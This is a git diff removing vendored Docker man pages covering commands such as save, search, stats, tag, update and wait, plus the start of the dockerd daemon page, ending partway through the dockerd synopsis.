-$ docker run -d --isolation default busybox top
-$ docker run -d --isolation process busybox top
-```
-
-If you have set the `--exec-opt isolation=hyperv` option on the Docker `daemon`, any of these commands also result in `hyperv` isolation:
-
-```
-$ docker run -d --isolation default busybox top
-$ docker run -d --isolation hyperv busybox top
-```
-
-## Setting Namespaced Kernel Parameters (Sysctls)
-
-The `--sysctl` sets namespaced kernel parameters (sysctls) in the
-container. For example, to turn on IP forwarding in the containers
-network namespace, run this command:
-
-    $ docker run --sysctl net.ipv4.ip_forward=1 someimage
-
-Note:
-
-Not all sysctls are namespaced. Docker does not support changing sysctls
-inside of a container that also modify the host system. As the kernel 
-evolves we expect to see more sysctls become namespaced.
-
-See the definition of the `--sysctl` option above for the current list of 
-supported sysctls.
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-July 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-November 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-save.1.md b/vendor/github.com/docker/docker/man/docker-save.1.md
deleted file mode 100644
index 1d1de8a1df..0000000000
--- a/vendor/github.com/docker/docker/man/docker-save.1.md
+++ /dev/null
@@ -1,45 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-save - Save one or more images to a tar archive (streamed to STDOUT by default)
-
-# SYNOPSIS
-**docker save**
-[**--help**]
-[**-o**|**--output**[=*OUTPUT*]]
-IMAGE [IMAGE...]
-
-# DESCRIPTION
-Produces a tarred repository to the standard output stream. Contains all
-parent layers, and all tags + versions, or specified repo:tag.
-
-Stream to a file instead of STDOUT by using **-o**.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-**-o**, **--output**=""
-   Write to a file, instead of STDOUT
-
-# EXAMPLES
-
-Save all fedora repository images to a fedora-all.tar and save the latest
-fedora image to a fedora-latest.tar:
-
-    $ docker save fedora > fedora-all.tar
-    $ docker save --output=fedora-latest.tar fedora:latest
-    $ ls -sh fedora-all.tar
-    721M fedora-all.tar
-    $ ls -sh fedora-latest.tar
-    367M fedora-latest.tar
-
-# See also
-**docker-load(1)** to load an image from a tar archive on STDIN.
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-November 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-search.1.md b/vendor/github.com/docker/docker/man/docker-search.1.md
deleted file mode 100644
index ad8bbc78b2..0000000000
--- a/vendor/github.com/docker/docker/man/docker-search.1.md
+++ /dev/null
@@ -1,70 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-search - Search the Docker Hub for images
-
-# SYNOPSIS
-**docker search**
-[**-f**|**--filter**[=*[]*]]
-[**--help**]
-[**--limit**[=*LIMIT*]]
-[**--no-trunc**]
-TERM
-
-# DESCRIPTION
-
-Search Docker Hub for images that match the specified `TERM`. The table
-of images returned displays the name, description (truncated by default), number
-of stars awarded, whether the image is official, and whether it is automated.
-
-*Note* - Search queries will only return up to 25 results
-
-# OPTIONS
-
-**-f**, **--filter**=[]
-   Filter output based on these conditions:
-   - stars=<numberOfStar>
-   - is-automated=(true|false)
-   - is-official=(true|false)
-
-**--help**
-  Print usage statement
-
-**--limit**=*LIMIT*
-  Maximum returned search results. The default is 25.
-
-**--no-trunc**=*true*|*false*
-   Don't truncate output. The default is *false*.
-
-# EXAMPLES
-
-## Search Docker Hub for ranked images
-
-Search a registry for the term 'fedora' and only display those images
-ranked 3 or higher:
-
-    $ docker search --filter=stars=3 fedora
-    NAME                  DESCRIPTION                                    STARS OFFICIAL  AUTOMATED
-    mattdm/fedora         A basic Fedora image corresponding roughly...  50
-    fedora                (Semi) Official Fedora base image.             38
-    mattdm/fedora-small   A small Fedora image on which to build. Co...  8
-    goldmann/wildfly      A WildFly application server running on a ...  3               [OK]
-
-## Search Docker Hub for automated images
-
-Search Docker Hub for the term 'fedora' and only display automated images
-ranked 1 or higher:
-
-    $ docker search --filter=is-automated=true --filter=stars=1 fedora
-    NAME               DESCRIPTION                                     STARS OFFICIAL  AUTOMATED
-    goldmann/wildfly   A WildFly application server running on a ...   3               [OK]
-    tutum/fedora-20    Fedora 20 image with SSH access. For the r...   1               [OK]
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-April 2015, updated by Mary Anthony for v2 <mary@docker.com>
-April 2016, updated by Vincent Demeester <vincent@sbr.pm>
-
diff --git a/vendor/github.com/docker/docker/man/docker-start.1.md b/vendor/github.com/docker/docker/man/docker-start.1.md
deleted file mode 100644
index c00b0a1668..0000000000
--- a/vendor/github.com/docker/docker/man/docker-start.1.md
+++ /dev/null
@@ -1,39 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-start - Start one or more containers
-
-# SYNOPSIS
-**docker start**
-[**-a**|**--attach**]
-[**--detach-keys**[=*[]*]]
-[**--help**]
-[**-i**|**--interactive**]
-CONTAINER [CONTAINER...]
-
-# DESCRIPTION
-
-Start one or more containers.
-
-# OPTIONS
-**-a**, **--attach**=*true*|*false*
-   Attach container's STDOUT and STDERR and forward all signals to the
-   process. The default is *false*.
-
-**--detach-keys**=""
-   Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
-
-**--help**
-  Print usage statement
-
-**-i**, **--interactive**=*true*|*false*
-   Attach container's STDIN. The default is *false*.
-
-# See also
-**docker-stop(1)** to stop a container.
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-stats.1.md b/vendor/github.com/docker/docker/man/docker-stats.1.md
deleted file mode 100644
index 0f022cd412..0000000000
--- a/vendor/github.com/docker/docker/man/docker-stats.1.md
+++ /dev/null
@@ -1,57 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-stats - Display a live stream of one or more containers' resource usage statistics
-
-# SYNOPSIS
-**docker stats**
-[**-a**|**--all**]
-[**--help**]
-[**--no-stream**]
-[**--format[="*TEMPLATE*"]**]
-[CONTAINER...]
-
-# DESCRIPTION
-
-Display a live stream of one or more containers' resource usage statistics
-
-# OPTIONS
-**-a**, **--all**=*true*|*false*
-   Show all containers. Only running containers are shown by default. The default is *false*.
-
-**--help**
-  Print usage statement
-
-**--no-stream**=*true*|*false*
-  Disable streaming stats and only pull the first result, default setting is false.
-
-**--format**="*TEMPLATE*"
-   Pretty-print containers statistics using a Go template.
-   Valid placeholders:
-      .Container - Container name or ID.
-      .Name - Container name.
-      .ID - Container ID.
-      .CPUPerc - CPU percentage.
-      .MemUsage - Memory usage.
-      .NetIO - Network IO.
-      .BlockIO - Block IO.
-      .MemPerc - Memory percentage (Not available on Windows).
-      .PIDs - Number of PIDs (Not available on Windows).
-
-# EXAMPLES
-
-Running `docker stats` on all running containers
-
-    $ docker stats
-    CONTAINER           CPU %               MEM USAGE / LIMIT     MEM %               NET I/O             BLOCK I/O
-    1285939c1fd3        0.07%               796 KiB / 64 MiB        1.21%               788 B / 648 B       3.568 MB / 512 KB
-    9c76f7834ae2        0.07%               2.746 MiB / 64 MiB      4.29%               1.266 KB / 648 B    12.4 MB / 0 B
-    d1ea048f04e4        0.03%               4.583 MiB / 64 MiB      6.30%               2.854 KB / 648 B    27.7 MB / 0 B
-
-Running `docker stats` on multiple containers by name and id.
-
-    $ docker stats fervent_panini 5acfcb1b4fd1
-    CONTAINER           CPU %               MEM USAGE/LIMIT     MEM %               NET I/O
-    5acfcb1b4fd1        0.00%               115.2 MiB/1.045 GiB   11.03%              1.422 kB/648 B
-    fervent_panini      0.02%               11.08 MiB/1.045 GiB   1.06%               648 B/648 B
diff --git a/vendor/github.com/docker/docker/man/docker-stop.1.md b/vendor/github.com/docker/docker/man/docker-stop.1.md
deleted file mode 100644
index fa377c92c4..0000000000
--- a/vendor/github.com/docker/docker/man/docker-stop.1.md
+++ /dev/null
@@ -1,30 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-stop - Stop a container by sending SIGTERM and then SIGKILL after a grace period
-
-# SYNOPSIS
-**docker stop**
-[**--help**]
-[**-t**|**--time**[=*10*]]
-CONTAINER [CONTAINER...]
-
-# DESCRIPTION
-Stop a container (Send SIGTERM, and then SIGKILL after
- grace period)
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-**-t**, **--time**=*10*
-  Number of seconds to wait for the container to stop before killing it. Default is 10 seconds.
-
-#See also
-**docker-start(1)** to restart a stopped container.
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-tag.1.md b/vendor/github.com/docker/docker/man/docker-tag.1.md
deleted file mode 100644
index 7f27e1b0e1..0000000000
--- a/vendor/github.com/docker/docker/man/docker-tag.1.md
+++ /dev/null
@@ -1,76 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-tag - Create a tag `TARGET_IMAGE` that refers to `SOURCE_IMAGE`
-
-# SYNOPSIS
-**docker tag**
-[**--help**]
-SOURCE_NAME[:TAG] TARGET_NAME[:TAG]
-
-# DESCRIPTION
-Assigns a new alias to an image in a registry. An alias refers to the
-entire image name including the optional `TAG` after the ':'. 
-
-# "OPTIONS"
-**--help**
-   Print usage statement.
-
-**NAME**
-   The image name which is made up of slash-separated name components, 
-   optionally prefixed by a registry hostname. The hostname must comply with 
-   standard DNS rules, but may not contain underscores. If a hostname is 
-   present, it may optionally be followed by a port number in the format 
-   `:8080`. If not present, the command uses Docker's public registry located at
-   `registry-1.docker.io` by default. Name components may contain lowercase 
-   characters, digits and separators. A separator is defined as a period, one or 
-   two underscores, or one or more dashes. A name component may not start or end 
-   with a separator.
-
-**TAG**
-   The tag assigned to the image to version and distinguish images with the same
-   name. The tag name may contain lowercase and uppercase characters, digits, 
-   underscores, periods and dashes. A tag name may not start with a period or a 
-   dash and may contain a maximum of 128 characters.
-
-# EXAMPLES
-
-## Tagging an image referenced by ID
-
-To tag a local image with ID "0e5574283393" into the "fedora" repository with 
-"version1.0":
-
-    docker tag 0e5574283393 fedora/httpd:version1.0
-
-## Tagging an image referenced by Name
-
-To tag a local image with name "httpd" into the "fedora" repository with 
-"version1.0":
-
-    docker tag httpd fedora/httpd:version1.0
-
-Note that since the tag name is not specified, the alias is created for an
-existing local version `httpd:latest`.
-
-## Tagging an image referenced by Name and Tag
-
-To tag a local image with name "httpd" and tag "test" into the "fedora"
-repository with "version1.0.test":
-
-    docker tag httpd:test fedora/httpd:version1.0.test
-
-## Tagging an image for a private repository
-
-To push an image to a private registry and not the central Docker
-registry you must tag it with the registry hostname and port (if needed).
-
-    docker tag 0e5574283393 myregistryhost:5000/fedora/httpd:version1.0
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-July 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-April 2015, updated by Mary Anthony for v2 <mary@docker.com>
-June 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-top.1.md b/vendor/github.com/docker/docker/man/docker-top.1.md
deleted file mode 100644
index a666f7cd37..0000000000
--- a/vendor/github.com/docker/docker/man/docker-top.1.md
+++ /dev/null
@@ -1,36 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-top - Display the running processes of a container
-
-# SYNOPSIS
-**docker top**
-[**--help**]
-CONTAINER [ps OPTIONS]
-
-# DESCRIPTION
-
-Display the running process of the container. ps-OPTION can be any of the options you would pass to a Linux ps command.
-
-All displayed information is from host's point of view.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-# EXAMPLES
-
-Run **docker top** with the ps option of -x:
-
-    $ docker top 8601afda2b -x
-    PID      TTY       STAT       TIME         COMMAND
-    16623    ?         Ss         0:00         sleep 99999
-
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-June 2015, updated by Ma Shimiao <mashimiao.fnst@cn.fujitsu.com>
-December 2015, updated by Pavel Pospisil <pospispa@gmail.com>
diff --git a/vendor/github.com/docker/docker/man/docker-unpause.1.md b/vendor/github.com/docker/docker/man/docker-unpause.1.md
deleted file mode 100644
index e6fd3c4e01..0000000000
--- a/vendor/github.com/docker/docker/man/docker-unpause.1.md
+++ /dev/null
@@ -1,28 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-unpause - Unpause all processes within one or more containers
-
-# SYNOPSIS
-**docker unpause**
-CONTAINER [CONTAINER...]
-
-# DESCRIPTION
-
-The `docker unpause` command un-suspends all processes in the specified containers.
-On Linux, it does this using the cgroups freezer.
-
-See the [cgroups freezer documentation]
-(https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) for
-further details.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-# See also
-**docker-pause(1)** to pause all processes within one or more containers.
-
-# HISTORY
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-update.1.md b/vendor/github.com/docker/docker/man/docker-update.1.md
deleted file mode 100644
index 85f3dd07c1..0000000000
--- a/vendor/github.com/docker/docker/man/docker-update.1.md
+++ /dev/null
@@ -1,171 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-update - Update configuration of one or more containers
-
-# SYNOPSIS
-**docker update**
-[**--blkio-weight**[=*[BLKIO-WEIGHT]*]]
-[**--cpu-shares**[=*0*]]
-[**--cpu-period**[=*0*]]
-[**--cpu-quota**[=*0*]]
-[**--cpu-rt-period**[=*0*]]
-[**--cpu-rt-runtime**[=*0*]]
-[**--cpuset-cpus**[=*CPUSET-CPUS*]]
-[**--cpuset-mems**[=*CPUSET-MEMS*]]
-[**--help**]
-[**--kernel-memory**[=*KERNEL-MEMORY*]]
-[**-m**|**--memory**[=*MEMORY*]]
-[**--memory-reservation**[=*MEMORY-RESERVATION*]]
-[**--memory-swap**[=*MEMORY-SWAP*]]
-[**--restart**[=*""*]]
-CONTAINER [CONTAINER...]
-
-# DESCRIPTION
-
-The **docker update** command dynamically updates container configuration.
-You can use this command to prevent containers from consuming too many 
-resources from their Docker host.  With a single command, you can place 
-limits on a single container or on many. To specify more than one container,
-provide space-separated list of container names or IDs.
-
-With the exception of the **--kernel-memory** option, you can specify these
-options on a running or a stopped container. On kernel version older than
-4.6, You can only update **--kernel-memory** on a stopped container or on
-a running container with kernel memory initialized.
-
-# OPTIONS
-
-**--blkio-weight**=0
-   Block IO weight (relative weight) accepts a weight value between 10 and 1000.
-
-**--cpu-shares**=0
-   CPU shares (relative weight)
-
-**--cpu-period**=0
-   Limit the CPU CFS (Completely Fair Scheduler) period
-
-   Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify.
-
-**--cpu-quota**=0
-   Limit the CPU CFS (Completely Fair Scheduler) quota
-
-**--cpu-rt-period**=0
-   Limit the CPU real-time period in microseconds
-
-   Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify.
-
-**--cpu-rt-runtime**=0
-   Limit the CPU real-time runtime in microseconds
-
-   Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex:
-   Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks.
-
-   The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup.
-
-**--cpuset-cpus**=""
-   CPUs in which to allow execution (0-3, 0,1)
-
-**--cpuset-mems**=""
-   Memory nodes(MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
-
-**--help**
-   Print usage statement
-
-**--kernel-memory**=""
-   Kernel memory limit (format: `<number>[<unit>]`, where unit = b, k, m or g)
-
-   Note that on kernel version older than 4.6, you can not update kernel memory on
-   a running container if the container is started without kernel memory initialized,
-   in this case, it can only be updated after it's stopped. The new setting takes
-   effect when the container is started.
-
-**-m**, **--memory**=""
-   Memory limit (format: <number><optional unit>, where unit = b, k, m or g)
-
-   Note that the memory should be smaller than the already set swap memory limit.
-   If you want update a memory limit bigger than the already set swap memory limit,
-   you should update swap memory limit at the same time. If you don't set swap memory 
-   limit on docker create/run but only memory limit, the swap memory is double
-   the memory limit.
-
-**--memory-reservation**=""
-   Memory soft limit (format: <number>[<unit>], where unit = b, k, m or g)
-
-**--memory-swap**=""
-   Total memory limit (memory + swap)
-
-**--restart**=""
-   Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped).
-
-# EXAMPLES
-
-The following sections illustrate ways to use this command.
-
-### Update a container's cpu-shares
-
-To limit a container's cpu-shares to 512, first identify the container
-name or ID. You can use **docker ps** to find these values. You can also
-use the ID returned from the **docker run** command.  Then, do the following:
-
-```bash
-$ docker update --cpu-shares 512 abebf7571666
-```
-
-### Update a container with cpu-shares and memory
-
-To update multiple resource configurations for multiple containers:
-
-```bash
-$ docker update --cpu-shares 512 -m 300M abebf7571666 hopeful_morse
-```
-
-### Update a container's kernel memory constraints
-
-You can update a container's kernel memory limit using the **--kernel-memory**
-option. On kernel version older than 4.6, this option can be updated on a
-running container only if the container was started with **--kernel-memory**.
-If the container was started *without* **--kernel-memory** you need to stop
-the container before updating kernel memory.
-
-For example, if you started a container with this command:
-
-```bash
-$ docker run -dit --name test --kernel-memory 50M ubuntu bash
-```
-
-You can update kernel memory while the container is running:
-
-```bash
-$ docker update --kernel-memory 80M test
-```
-
-If you started a container *without* kernel memory initialized:
-
-```bash
-$ docker run -dit --name test2 --memory 300M ubuntu bash
-```
-
-Update kernel memory of running container `test2` will fail. You need to stop
-the container before updating the **--kernel-memory** setting. The next time you
-start it, the container uses the new value.
-
-Kernel version newer than (include) 4.6 does not have this limitation, you
-can use `--kernel-memory` the same way as other options.
-
-### Update a container's restart policy
-
-You can change a container's restart policy on a running container. The new
-restart policy takes effect instantly after you run `docker update` on a
-container.
-
-To update restart policy for one or more containers:
-
-```bash
-$ docker update --restart=on-failure:3 abebf7571666 hopeful_morse
-```
-
-Note that if the container is started with "--rm" flag, you cannot update the restart
-policy for it. The `AutoRemove` and `RestartPolicy` are mutually exclusive for the
-container.
diff --git a/vendor/github.com/docker/docker/man/docker-version.1.md b/vendor/github.com/docker/docker/man/docker-version.1.md
deleted file mode 100644
index 1838f82052..0000000000
--- a/vendor/github.com/docker/docker/man/docker-version.1.md
+++ /dev/null
@@ -1,62 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2015
-# NAME
-docker-version - Show the Docker version information.
-
-# SYNOPSIS
-**docker version**
-[**--help**]
-[**-f**|**--format**[=*FORMAT*]]
-
-# DESCRIPTION
-This command displays version information for both the Docker client and 
-daemon. 
-
-# OPTIONS
-**--help**
-    Print usage statement
-
-**-f**, **--format**=""
-    Format the output using the given Go template.
-
-# EXAMPLES
-
-## Display Docker version information
-
-The default output:
-
-    $ docker version
-	Client:
-	 Version:      1.8.0
-	 API version:  1.20
-	 Go version:   go1.4.2
-	 Git commit:   f5bae0a
-	 Built:        Tue Jun 23 17:56:00 UTC 2015
-	 OS/Arch:      linux/amd64
-
-	Server:
-	 Version:      1.8.0
-	 API version:  1.20
-	 Go version:   go1.4.2
-	 Git commit:   f5bae0a
-	 Built:        Tue Jun 23 17:56:00 UTC 2015
-	 OS/Arch:      linux/amd64
-
-Get server version:
-
-    $ docker version --format '{{.Server.Version}}'
-	1.8.0
-
-Dump raw data:
-
-To view all available fields, you can use the format `{{json .}}`.
-
-    $ docker version --format '{{json .}}'
-    {"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"},"ServerOK":true,"Server":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","KernelVersion":"3.13.2-gentoo","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"}}
-
-	
-# HISTORY
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-June 2015, updated by John Howard <jhoward@microsoft.com>
-June 2015, updated by Patrick Hemmer <patrick.hemmer@gmail.com>
diff --git a/vendor/github.com/docker/docker/man/docker-wait.1.md b/vendor/github.com/docker/docker/man/docker-wait.1.md
deleted file mode 100644
index 678800966b..0000000000
--- a/vendor/github.com/docker/docker/man/docker-wait.1.md
+++ /dev/null
@@ -1,30 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-wait - Block until one or more containers stop, then print their exit codes
-
-# SYNOPSIS
-**docker wait**
-[**--help**]
-CONTAINER [CONTAINER...]
-
-# DESCRIPTION
-
-Block until one or more containers stop, then print their exit codes.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-# EXAMPLES
-
-    $ docker run -d fedora sleep 99
-    079b83f558a2bc52ecad6b2a5de13622d584e6bb1aea058c11b36511e85e7622
-    $ docker wait 079b83f558a2bc
-    0
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker.1.md b/vendor/github.com/docker/docker/man/docker.1.md
deleted file mode 100644
index 2a96184439..0000000000
--- a/vendor/github.com/docker/docker/man/docker.1.md
+++ /dev/null
@@ -1,237 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% William Henry
-% APRIL 2014
-# NAME
-docker \- Docker image and container command line interface
-
-# SYNOPSIS
-**docker** [OPTIONS] COMMAND [ARG...]
-
-**docker** daemon [--help|...]
-
-**docker** [--help|-v|--version]
-
-# DESCRIPTION
-is a client for interacting with the daemon (see **dockerd(8)**) through the CLI.
-
-The Docker CLI has over 30 commands. The commands are listed below and each has
-its own man page which explain usage and arguments.
-
-To see the man page for a command run **man docker <command>**.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-**--config**=""
-  Specifies the location of the Docker client configuration files. The default is '~/.docker'.
-
-**-D**, **--debug**=*true*|*false*
-  Enable debug mode. Default is false.
-
-**-H**, **--host**=[*unix:///var/run/docker.sock*]: tcp://[host]:[port][path] to bind or
-unix://[/path/to/socket] to use.
-  The socket(s) to bind to in daemon mode specified using one or more
-  tcp://host:port/path, unix:///path/to/socket, fd://* or fd://socketfd.
-  If the tcp port is not specified, then it will default to either `2375` when
-  `--tls` is off, or `2376` when `--tls` is on, or `--tlsverify` is specified.
-
-**-l**, **--log-level**="*debug*|*info*|*warn*|*error*|*fatal*"
-  Set the logging level. Default is `info`.
-
-**--tls**=*true*|*false*
-  Use TLS; implied by --tlsverify. Default is false.
-
-**--tlscacert**=*~/.docker/ca.pem*
-  Trust certs signed only by this CA.
-
-**--tlscert**=*~/.docker/cert.pem*
-  Path to TLS certificate file.
-
-**--tlskey**=*~/.docker/key.pem*
-  Path to TLS key file.
-
-**--tlsverify**=*true*|*false*
-  Use TLS and verify the remote (daemon: verify client, client: verify daemon).
-  Default is false.
-
-**-v**, **--version**=*true*|*false*
-  Print version information and quit. Default is false.
-
-# COMMANDS
-**attach**
-  Attach to a running container
-  See **docker-attach(1)** for full documentation on the **attach** command.
-
-**build**
-  Build an image from a Dockerfile
-  See **docker-build(1)** for full documentation on the **build** command.
-
-**commit**
-  Create a new image from a container's changes
-  See **docker-commit(1)** for full documentation on the **commit** command.
-
-**cp**
-  Copy files/folders between a container and the local filesystem
-  See **docker-cp(1)** for full documentation on the **cp** command.
-
-**create**
-  Create a new container
-  See **docker-create(1)** for full documentation on the **create** command.
-
-**diff**
-  Inspect changes on a container's filesystem
-  See **docker-diff(1)** for full documentation on the **diff** command.
-
-**events**
-  Get real time events from the server
-  See **docker-events(1)** for full documentation on the **events** command.
-
-**exec**
-  Run a command in a running container
-  See **docker-exec(1)** for full documentation on the **exec** command.
-
-**export**
-  Stream the contents of a container as a tar archive
-  See **docker-export(1)** for full documentation on the **export** command.
-
-**history**
-  Show the history of an image
-  See **docker-history(1)** for full documentation on the **history** command.
-
-**images**
-  List images
-  See **docker-images(1)** for full documentation on the **images** command.
-
-**import**
-  Create a new filesystem image from the contents of a tarball
-  See **docker-import(1)** for full documentation on the **import** command.
-
-**info**
-  Display system-wide information
-  See **docker-info(1)** for full documentation on the **info** command.
-
-**inspect**
-  Return low-level information on a container or image
-  See **docker-inspect(1)** for full documentation on the **inspect** command.
-
-**kill**
-  Kill a running container (which includes the wrapper process and everything
-inside it)
-  See **docker-kill(1)** for full documentation on the **kill** command.
-
-**load**
-  Load an image from a tar archive
-  See **docker-load(1)** for full documentation on the **load** command.
-
-**login**
-  Log in to a Docker Registry
-  See **docker-login(1)** for full documentation on the **login** command.
-
-**logout**
-  Log the user out of a Docker Registry
-  See **docker-logout(1)** for full documentation on the **logout** command.
-
-**logs**
-  Fetch the logs of a container
-  See **docker-logs(1)** for full documentation on the **logs** command.
-
-**pause**
-  Pause all processes within a container
-  See **docker-pause(1)** for full documentation on the **pause** command.
-
-**port**
-  Lookup the public-facing port which is NAT-ed to PRIVATE_PORT
-  See **docker-port(1)** for full documentation on the **port** command.
-
-**ps**
-  List containers
-  See **docker-ps(1)** for full documentation on the **ps** command.
-
-**pull**
-  Pull an image or a repository from a Docker Registry
-  See **docker-pull(1)** for full documentation on the **pull** command.
-
-**push**
-  Push an image or a repository to a Docker Registry
-  See **docker-push(1)** for full documentation on the **push** command.
-
-**rename**
-  Rename a container.
-  See **docker-rename(1)** for full documentation on the **rename** command.
-
-**restart**
-  Restart one or more containers
-  See **docker-restart(1)** for full documentation on the **restart** command.
-
-**rm**
-  Remove one or more containers
-  See **docker-rm(1)** for full documentation on the **rm** command.
-
-**rmi**
-  Remove one or more images
-  See **docker-rmi(1)** for full documentation on the **rmi** command.
-
-**run**
-  Run a command in a new container
-  See **docker-run(1)** for full documentation on the **run** command.
-
-**save**
-  Save an image to a tar archive
-  See **docker-save(1)** for full documentation on the **save** command.
-
-**search**
-  Search for an image in the Docker index
-  See **docker-search(1)** for full documentation on the **search** command.
-
-**start**
-  Start a container
-  See **docker-start(1)** for full documentation on the **start** command.
-
-**stats**
-  Display a live stream of one or more containers' resource usage statistics
-  See **docker-stats(1)** for full documentation on the **stats** command.
-
-**stop**
-  Stop a container
-  See **docker-stop(1)** for full documentation on the **stop** command.
-
-**tag**
-  Tag an image into a repository
-  See **docker-tag(1)** for full documentation on the **tag** command.
-
-**top**
-  Lookup the running processes of a container
-  See **docker-top(1)** for full documentation on the **top** command.
-
-**unpause**
-  Unpause all processes within a container
-  See **docker-unpause(1)** for full documentation on the **unpause** command.
-
-**version**
-  Show the Docker version information
-  See **docker-version(1)** for full documentation on the **version** command.
-
-**wait**
-  Block until a container stops, then print its exit code
-  See **docker-wait(1)** for full documentation on the **wait** command.
-
-
-# RUNTIME EXECUTION OPTIONS
-
-Use the **--exec-opt** flags to specify options to the execution driver.
-The following options are available:
-
-#### native.cgroupdriver
-Specifies the management of the container's `cgroups`. You can specify `cgroupfs`
-or `systemd`. If you specify `systemd` and it is not available, the system errors
-out.
-
-#### Client
-For specific client examples please see the man page for the specific Docker
-command. For example:
-
-    man docker-run
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com) based on docker.com source material and internal work.
diff --git a/vendor/github.com/docker/docker/man/dockerd.8.md b/vendor/github.com/docker/docker/man/dockerd.8.md
deleted file mode 100644
index 761dc6b9be..0000000000
--- a/vendor/github.com/docker/docker/man/dockerd.8.md
+++ /dev/null
@@ -1,710 +0,0 @@
-% DOCKER(8) Docker User Manuals
-% Shishir Mahajan
-% SEPTEMBER 2015
-# NAME
-dockerd - Enable daemon mode
-
-# SYNOPSIS
-**dockerd**
-[**--add-runtime**[=*[]*]]
-[**--api-cors-header**=[=*API-CORS-HEADER*]]
-[**--authorization-plugin**[=*[]*]]
-[**-b**|**--bridge**[=*BRIDGE*]]
-[**--bip**[=*BIP*]]
-[**--cgroup-parent**[=*[]*]]
-[**--cluster-store**[=*[]*]]
-[**--cluster-advertise**[=*[]*]]
-[**--cluster-store-opt**[=*map[]*]]
-[**--config-file**[=*/etc/docker/daemon.json*]]
-[**--containerd**[=*SOCKET-PATH*]]
-[**-D**|**--debug**]
-[**--default-gateway**[=*DEFAULT-GATEWAY*]]
-[**--default-gateway-v6**[=*DEFAULT-GATEWAY-V6*]]
-[**--default-runtime**[=*runc*]]
-[**--default-ulimit**[=*[]*]]
-[**--disable-legacy-registry**]
-[**--dns**[=*[]*]]
-[**--dns-opt**[=*[]*]]
-[**--dns-search**[=*[]*]]
-[**--exec-opt**[=*[]*]]
-[**--exec-root**[=*/var/run/docker*]]
